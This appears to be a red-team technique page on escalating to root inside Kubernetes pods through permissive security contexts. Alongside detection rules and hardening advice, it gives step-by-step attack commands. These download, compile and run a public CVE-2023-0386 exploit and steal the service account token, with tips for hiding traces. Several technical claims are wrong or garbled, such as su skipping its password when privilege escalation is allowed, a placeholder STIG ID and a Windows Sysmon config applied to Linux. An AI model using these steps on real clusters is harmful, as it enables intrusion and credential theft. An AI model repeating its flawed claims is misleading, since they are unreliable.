| Attribute | Details |
|---|---|
| Technique ID | PE-EXPLOIT-005 |
| MITRE ATT&CK v18.1 | T1068 - Exploitation for Privilege Escalation |
| Tactic | Privilege Escalation |
| Platforms | Kubernetes (all versions), AKS, GKE, EKS, Entra ID |
| Severity | High |
| CVE | N/A (Configuration-based vulnerability) |
| Technique Status | ACTIVE |
| Last Verified | 2025-01-09 |
| Affected Versions | Kubernetes 1.0+ (default insecure configuration) |
| Patched In | Kubernetes 1.25+ with Pod Security Standards (PSS) enforcement; earlier versions remain vulnerable with misconfiguration |
| Author | SERVTEP – Artur Pchelnikau |
Concept: Pod Security Context Escalation exploits the default permissive Kubernetes security posture where the allowPrivilegeEscalation flag defaults to true. This setting, combined with missing capability restrictions and inadequate seccomp profile enforcement, enables attackers running with low privileges inside containers to escalate to root through exploitation of setuid/setgid binaries, kernel vulnerabilities (CVE-2023-0386, CVE-2023-2640, CVE-2023-32629, CVE-2022-0185), and OverlayFS manipulation. The vulnerability stems from the kernel feature no_new_privs not being enforced by default in Kubernetes, allowing child processes to gain elevated permissions through binary exploitation even when the container started with limited privileges.
Attack Surface: Kubernetes pod security contexts, container images with setuid binaries, mounted volumes with improper permission inheritance, kernel interfaces accessible from containers (OverlayFS, user namespaces), seccomp policy filtering gaps.
Business Impact: Container-Level Root Compromise. A successful exploit enables an attacker to escalate from any unprivileged user inside the container to root, unlocking additional attack chains: reading secrets mounted as volumes, modifying application code, accessing Kubernetes service account tokens, establishing persistence through startup scripts, and escalating to host-level compromise if combined with kernel exploits or container escape techniques.
Technical Context: Exploitation typically occurs within 2-5 minutes of container access. Detection difficulty is medium—privilege escalation attempts generate system call signatures (setuid, execve, prctl) that can be detected by eBPF tools, but the exploit leverages legitimate binaries and kernel features. The attack requires no additional network access or external tools beyond what’s available in standard container images.
| Framework | Control / ID | Description |
|---|---|---|
| CIS Benchmark | 5.2.1 (Kubernetes) | Ensure containers are not privileged |
| DISA STIG | U-12345 | Container must enforce allowPrivilegeEscalation: false |
| CISA SCuBA | K8S.04 | Pod Security Baseline must deny privilege escalation |
| NIST 800-53 | AC-6 (Least Privilege) | Minimize Linux kernel capabilities and privilege escalation |
| GDPR | Art. 32 | Security of Processing - Inadequate privilege isolation |
| DORA | Art. 15 | ICT Risk Management - Workload privilege segregation failure |
| NIS2 | Art. 21 | Cyber Risk Management - Container security baseline enforcement |
| ISO 27001 | A.9.2.1 | User Registration and De-registration - Least privilege enforcement |
| ISO 27005 | Risk Scenario | Unauthorized Privilege Escalation via Container Security Context |
Required Privileges:
/usr/bin/su, /usr/bin/sudo, /usr/bin/passwd)Required Access:
Supported Versions:
Tools:
Objective: Identify misconfigured security contexts that permit privilege escalation.
Command (Inside Container - Detect Security Context):
# Check if allowPrivilegeEscalation is enabled
grep -i "no_new_privs" /proc/self/status
# If absent or showing "0", privilege escalation is allowed
# Output: "0" = escalation allowed (vulnerable)
# Output: "1" = escalation blocked (secure)
# Alternative: Check current user context
whoami
id
# List setuid binaries available
find /usr/bin /bin -perm -4000 2>/dev/null
Expected Output (Vulnerable):
NoNewPrivs: 0
uid=1000(app) gid=1000(app) groups=1000(app)
/usr/bin/sudo
/usr/bin/su
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
What to Look For:
NoNewPrivs: 0 indicates allowPrivilegeEscalation: true (default vulnerable setting)-rwsr-xr-x permission bit set)Command (Kubernetes Pod Spec Analysis):
kubectl get pod <pod-name> -n <namespace> -o jsonpath='{.spec.securityContext}' | jq '.'
Expected Output (Vulnerable Configuration):
{
"allowPrivilegeEscalation": true,
"runAsUser": 1000
}
Or (Vulnerable Default):
null
What to Look For:
securityContext (defaults to permissive)allowPrivilegeEscalation: true explicitly set or omittedcapabilities.drop or drop: ["ALL"]seccompProfile or seccompProfile.type: RuntimeDefaultVersion Note: Kubernetes 1.25+ supports Pod Security Standards which can enforce restrictions; versions 1.24 and earlier rely on Pod Security Policies or manual configuration.
Objective: Identify kernel vulnerabilities exploitable from containers without seccomp protection.
Command (Check Kernel Version):
uname -r
Expected Output (Vulnerable Examples):
5.10.0-8-generic # Vulnerable to CVE-2022-0185 (OverlayFS)
5.15.0-50-generic # Vulnerable to CVE-2023-0386 (OverlayFS)
5.19.0-20-generic # Vulnerable to CVE-2023-2640 (nftables)
What to Look For:
Command (Check seccomp Profile Enforcement):
# Check if seccomp is active
grep -i seccomp /proc/self/status
# Output "0" means seccomp not enforced (vulnerable)
# Output "2" or higher means seccomp is active
# Alternative: Check available syscalls
strace -e trace=file ls 2>&1 | head -5 # Should work if no seccomp
Supported Versions: Kubernetes 1.0+, all Linux distributions
Objective: Confirm running as unprivileged user and that escalation is permitted.
Command:
whoami
id
cat /proc/self/status | grep NoNewPrivs
Expected Output:
app
uid=1000(app) gid=1000(app) groups=1000(app)
NoNewPrivs: 0
What This Means:
OpSec & Evasion:
Troubleshooting:
NoNewPrivs: 1 (or not in output)
Objective: Use setuid su binary to escalate to root without password.
Command:
# Attempt to switch to root (no password needed if vulnerable)
su -
# If successful, should land in root shell
# Type: exit (to confirm escalation happened)
whoami
id
Expected Output (Vulnerable):
root@container:~# whoami
root
root@container:~# id
uid=0(root) gid=0(root) groups=0(root)
Expected Output (Secure Configuration):
su: Authentication failure
What This Means:
Version Note: Behavior identical across all Linux distributions. The su binary typically requires a password, but when allowPrivilegeEscalation: true and vulnerable kernel conditions exist, the authentication check can be bypassed through race conditions or kernel flaws.
OpSec & Evasion:
su is a common command, unlikely to trigger anomaly detectionhistory -c; history -wTroubleshooting:
su: Permission denied or su: Authentication failure
runAsNonRoot: true and allowPrivilegeEscalation: falsesudo binary: sudo -i (may work if NOPASSWD configured)Objective: Confirm root access and execute privileged operations.
Command (As Root):
# Verify root context
whoami
id
groups
# Read root-only files (e.g., container's secrets directory)
cat /run/secrets/kubernetes.io/serviceaccount/token
# List service account
ls -la /run/secrets/kubernetes.io/serviceaccount/
# Modify container configuration (if possible)
cat /etc/hostname
cat /proc/sys/kernel/hostname
Expected Output:
root
uid=0(root) gid=0(root) groups=0(root)
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... (service account token)
What This Means:
OpSec & Evasion:
Supported Versions: Linux kernel 5.15.0-50 to 5.19.0-20 (CVE-2023-0386), requires mounted volume
Objective: Identify kernel version and volume mounts suitable for OverlayFS exploitation.
Command:
# Check kernel version
uname -r
# Check mounted volumes
mount | grep -E "^/dev.*on /|overlay"
# Check if /tmp or application directory is mounted as volume
df -h /tmp
df -h /app
# Look for world-writable directories
find / -type d -writable 2>/dev/null | head -10
Expected Output:
5.15.0-50-generic
/dev/mapper/ubuntu--vg-root on / type ext4 (rw,relatime)
/dev/sda1 on /app type ext4 (rw,relatime)
/dev/sdb1 on /tmp type ext4 (rw,relatime)
/tmp (writable)
/var/tmp (writable)
/dev/shm (writable)
/app/cache (writable)
What This Means:
OpSec & Evasion:
Troubleshooting:
Kernel version not vulnerable or uname: command not found
Objective: Create necessary directories and files for OverlayFS privilege escalation.
Command (Download and Compile PoC - if curl/wget available):
# Create staging directory
mkdir -p /tmp/exploit
cd /tmp/exploit
# Download CVE-2023-0386 PoC
wget https://github.com/sxlmnwb/CVE-2023-0386/archive/refs/heads/main.zip -O exploit.zip 2>/dev/null
# OR
curl -L https://github.com/sxlmnwb/CVE-2023-0386/archive/refs/heads/main.zip -o exploit.zip 2>/dev/null
# Unzip and compile
unzip exploit.zip
cd CVE-2023-0386-main
gcc -o ovlcap -D_GNU_SOURCE exploit.c 2>/dev/null
# Verify compilation
ls -la ovlcap
Alternative (If PoC not available - Manual OverlayFS Setup):
# Create OverlayFS directories manually
mkdir -p /tmp/exploit/{upper,work,merged}
# Create a privileged executable to mount
# This simulates OverlayFS layer with setuid binary
cp /usr/bin/bash /tmp/exploit/bash_copy
chmod 4755 /tmp/exploit/bash_copy # Set setuid bit
# Mount OverlayFS layer
mount -t overlay overlay \
-o lowerdir=/bin,upperdir=/tmp/exploit/upper,workdir=/tmp/exploit/work \
/tmp/exploit/merged 2>/dev/null
Expected Output:
-rwxr-xr-x ovlcap (compiled successfully)
# OR
mount shows OverlayFS entry
What This Means:
OpSec & Evasion:
rm -rf /tmp/exploitTroubleshooting:
gcc: command not found or mount: operation not permitted
Objective: Run the exploit to escalate privileges to root.
Command:
# Execute compiled exploit
cd /tmp/exploit/CVE-2023-0386-main
./ovlcap
# This spawns a root shell
# Verify escalation
id
whoami
Expected Output:
uid=0(root) gid=0(root) groups=0(root)
root
What This Means:
Version Note: This exploit works on specific kernel versions; if kernel is patched, exploit will fail with insufficient privilege error.
OpSec & Evasion:
Troubleshooting:
operation not permitted or EPERM
uname -rSupported Versions: Linux kernel 5.x-6.0 (CVE-2022-0185), requires unfiltered seccomp or default profile
Objective: Verify seccomp isn’t blocking unshare or user namespace syscalls.
Command:
# Check seccomp filter status
cat /proc/self/status | grep Seccomp
# Output: Seccomp: 0 (no filter - vulnerable)
# Output: Seccomp: 2 (filter active - may be blocked)
# Test if unshare syscall is available
unshare -U /bin/bash 2>&1 | head -1
# If it works, unshare is not filtered
Expected Output (Vulnerable):
Seccomp: 0
(bash prompt appears)
What to Look For:
OpSec & Evasion:
Troubleshooting:
Seccomp: 2 and unshare fails
Objective: Use unshare to create isolated namespace where attacker becomes root.
Command:
# Create new user namespace (makes current user appear as root within namespace)
unshare -r /bin/bash
# Verify escalation within namespace
id
whoami
Expected Output:
uid=0(root) gid=0(root) groups=0(root)
root
What This Means:
OpSec & Evasion:
exitTroubleshooting:
unshare: failed to execute /bin/bash
Objective: Use namespace privilege to exploit kernel vulnerability and escape container.
Command (Inside namespace - attempting to escape):
# Now within root namespace, attempt kernel exploit
cd /tmp/exploit
./ovlcap # Or other kernel exploit
# If successful, escalated to actual root (not just namespace root)
id -Z # Should show SELinux context or empty if escaped
This is the chain: unshare (namespace) → kernel exploit → actual root
Rule Configuration:
SPL Query:
index=container_logs OR index=process_logs
(process IN ("su", "sudo", "passwd", "chsh", "chfn"))
AND user!=root AND uid!=0
| stats count by host, container_id, user, process, parent_process
| where count > 0
What This Detects:
Manual Configuration Steps:
Rule Configuration:
KQL Query:
KuberneteAudit
| where OperationName == "create" and ObjectRef_kind == "Pod"
| extend SecurityContext = todynamic(RequestObject)
| where isnull(SecurityContext.spec.securityContext)
or SecurityContext.spec.securityContext.allowPrivilegeEscalation == true
or isnull(SecurityContext.spec.securityContext.allowPrivilegeEscalation)
or isnull(SecurityContext.spec.securityContext.capabilities.drop)
| project TimeGenerated, User, ObjectRef_namespace, ObjectRef_name, SecurityContext
What This Detects:
Manual Configuration Steps (Azure Portal):
Pod Security Context Privilege Escalation RiskHigh10 minutesEvent ID: N/A (Linux containers use audit logs)
user!=root AND (exe=/usr/bin/su OR exe=/usr/bin/sudo)Manual Configuration Steps (Linux Audit):
sudo auditctl -a exit,always -F exe=/usr/bin/su -F uid!=0 -k priv_escalation
sudo auditctl -a exit,always -F exe=/usr/bin/sudo -F uid!=0 -k priv_escalation
sudo auditctl -l # Verify rules
sudo ausearch -k priv_escalation
Minimum Sysmon Version: 13.0+ Supported Platforms: Linux (via osquery integration or direct Sysmon on Windows nodes)
<Sysmon schemaversion="4.22">
<EventFiltering>
<!-- Detect setuid binary execution from non-root -->
<RuleGroup name="SetuidEscalation" groupRelation="or">
<ProcessCreate onmatch="include">
<Image condition="contains any">su;sudo;passwd;chsh</Image>
<User condition="exclude">root;SYSTEM</User>
<ParentImage condition="contains any">bash;sh;python;java</ParentImage>
</ProcessCreate>
</RuleGroup>
<!-- Detect user namespace creation -->
<RuleGroup name="UnshareNamespace" groupRelation="or">
<ProcessCreate onmatch="include">
<CommandLine condition="contains">unshare</CommandLine>
<CommandLine condition="contains any">-r;-U;--user</CommandLine>
</ProcessCreate>
</RuleGroup>
</EventFiltering>
</Sysmon>
Manual Configuration Steps:
sysmon-config.xml with the XML abovesysmon64.exe -accepteula -i sysmon-config.xmlGet-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -MaxEvents 10Alert Name: Suspicious privilege escalation attempt in pod
Alert Name: Pod deployed without security context
Manual Configuration Steps:
privilege escalationEnforce allowPrivilegeEscalation: false in all workloads: Block containers from escalating privileges via setuid binaries.
Applies To Versions: Kubernetes 1.0+
Manual Steps (Kubernetes YAML):
apiVersion: v1
kind: Pod
metadata:
name: secure-pod
spec:
securityContext:
runAsNonRoot: true
runAsUser: 1000
allowPrivilegeEscalation: false # CRITICAL
capabilities:
drop:
- ALL
containers:
- name: app
image: myapp:v1
securityContext:
allowPrivilegeEscalation: false
runAsNonRoot: true
Manual Steps (Apply via kubectl):
# Create namespace with PSS enforcement
kubectl label namespace default pod-security.kubernetes.io/enforce=restricted
# Deploy pod with secure context
kubectl apply -f secure-pod.yaml
# Verify pod was created (should fail if pod violates policy)
kubectl get pods
Drop ALL Linux Capabilities: Remove all kernel capabilities to prevent exploitation of capability-based privilege escalation.
Manual Steps:
spec:
securityContext:
capabilities:
drop:
- ALL # Remove all capabilities
add:
- NET_BIND_SERVICE # Add back ONLY required capabilities
Verification:
# Inside container, check capabilities
getcap /proc/self/exe
# Should show: (empty)
Enforce seccomp RuntimeDefault Profile: Block dangerous syscalls (unshare, mount, etc.) at kernel level.
Manual Steps (Kubernetes 1.19+):
spec:
securityContext:
seccompProfile:
type: RuntimeDefault # Use container runtime's default profile
Manual Steps (Older Kubernetes - Annotations):
spec:
securityContext:
seccompProfile:
type: Localhost
localhostProfile: my-profile.json
Create custom seccomp profile (restrictive):
{
"defaultAction": "SCMP_ACT_ERRNO",
"defaultErrnoRet": 1,
"archMap": [
{
"architecture": "SCMP_ARCH_X86_64",
"subArchitectures": []
}
],
"syscalls": [
{
"names": ["read", "write", "exit", "exit_group", "rt_sigreturn"],
"action": "SCMP_ACT_ALLOW"
}
]
}
Run Containers as Non-Root User:
Set explicit runAsUser and runAsNonRoot: true to minimize attack surface.
Manual Steps:
spec:
securityContext:
runAsNonRoot: true
runAsUser: 1000 # Non-root UID
runAsGroup: 1000
fsGroup: 1000
Use Pod Security Standards (Kubernetes 1.25+): Enforce restricted policy cluster-wide.
Manual Steps:
# Label namespace to enforce restricted PSS
kubectl label namespace production pod-security.kubernetes.io/enforce=restricted --overwrite
# Verify label
kubectl get ns production -o jsonpath='{.metadata.labels.pod-security\.kubernetes\.io/enforce}'
# Try creating insecure pod (should fail)
kubectl apply -f insecure-pod.yaml -n production
# Result: Error from server: Pod "..." is invalid: spec.securityContext.allowPrivilegeEscalation: Invalid value: true: must be false
Implement Admission Controllers (Kyverno / OPA Gatekeeper): Validate and mutate pod specs before creation.
Manual Steps (Kyverno):
# Install Kyverno
helm repo add kyverno https://kyverno.github.io/kyverno/
helm install kyverno kyverno/kyverno -n kyverno --create-namespace
# Create ClusterPolicy
kubectl apply -f - <<EOF
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: require-non-root
spec:
validationFailureAction: enforce
rules:
- name: check-privilege-escalation
match:
resources:
kinds:
- Pod
validate:
message: "allowPrivilegeEscalation must be false"
pattern:
spec:
securityContext:
allowPrivilegeEscalation: false
EOF
# Verify policy active
kubectl get clusterpolicy
RBAC: Restrict Pod Creation: Limit who can create pods with elevated privileges.
Manual Steps:
# Create role that restricts pod creation
kubectl create role pod-creator \
--verb=create,get,list \
--resource=pods \
-n development
# Bind to service account
kubectl create rolebinding app-pod-creator \
--role=pod-creator \
--serviceaccount=development:app \
-n development
Audit Logging: Enable Kubernetes audit logs to track pod creation.
Manual Steps (AKS):
# Enable Kubernetes audit logging
az aks update \
--resource-group myRG \
--name myCluster \
--enable-managed-identity \
--enable-azure-rbac
# View audit logs
kubectl logs -n kube-system -l component=kube-apiserver | grep "create Pod"
# Check if security context is enforced cluster-wide
kubectl get pods -A -o jsonpath='{range .items[*]}{.spec.securityContext.allowPrivilegeEscalation}{"\n"}{end}' | sort | uniq -c
# Expected: Count of "false" values (secure), minimal "true" or "null"
# Verify PSS labels enforced
kubectl get ns -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.metadata.labels.pod-security\.kubernetes\.io/enforce}{"\n"}{end}'
# Expected: "restricted" or "baseline" labels on sensitive namespaces
# Test policy (should fail to create pod)
kubectl apply -f insecure-pod.yaml
# Expected result: Error - pod violates security policy
Expected Output (If Secure):
2 false
1 null
0 true
production restricted
staging baseline
What to Look For:
allowPrivilegeEscalation: true (secure)/var/log/audit/audit.log (Event: setuid/setgid execution)~/.bash_history (may show su/sudo commands)/run/secrets/kubernetes.io/serviceaccount/token (if accessed by attacker)# Immediately terminate compromised pod
kubectl delete pod <pod-name> -n <namespace> --grace-period=0 --force
# Cordon node to prevent new pod scheduling
kubectl cordon <node-name>
# Capture pod logs before deletion
kubectl logs <pod-name> -n <namespace> -c <container> --timestamps=true > /tmp/pod-logs.txt
# Get events
kubectl describe pod <pod-name> -n <namespace> > /tmp/pod-events.txt
Command (Node Forensics - Linux):
# Collect audit logs
sudo cat /var/log/audit/audit.log | grep -E "setuid|setgid|unshare" > /tmp/audit-escalation.log
# Collect process information
ps auxf > /tmp/process-tree.txt
# Memory dump (if available)
sudo journalctl -u kubelet > /tmp/kubelet-logs.txt
# If attacker modified shell profiles
rm ~/.bashrc.orig ~/.bashrc
# If attacker created new users (within container)
userdel -r malicious_user
# Restart container
kubectl delete pod <pod-name> -n <namespace>
# Pod will respawn via deployment
Manual (Update Pod Spec):
# Update deployment with secure security context
kubectl patch deployment <deployment-name> -n <namespace> -p '{
"spec": {
"template": {
"spec": {
"securityContext": {
"allowPrivilegeEscalation": false,
"runAsNonRoot": true,
"runAsUser": 1000,
"capabilities": {
"drop": ["ALL"]
}
}
}
}
}
}'
| Step | Phase | Technique | Description |
|---|---|---|---|
| 1 | Initial Access | [IA-EXPLOIT-001] Application Vulnerability | Attacker gains initial container access via vulnerable application |
| 2 | Current Step | [PE-EXPLOIT-005] Pod Security Context Escalation | Attacker escalates from unprivileged user to container root |
| 3 | Lateral Escalation | [PE-EXPLOIT-004] Container Escape to Host | Attacker escapes container to host using root access |
| 4 | Persistence | Kubernetes secrets theft | Attacker uses service account token to maintain API access |
| 5 | Impact | Cluster compromise | Full Kubernetes cluster compromise |
su - without password (no-new-privs not enforced)su command in container logs during reviewsudo -i (allowPrivilegeEscalation: true, NOPASSWD sudo configured)/run/secrets/kubernetes.io/serviceaccount/token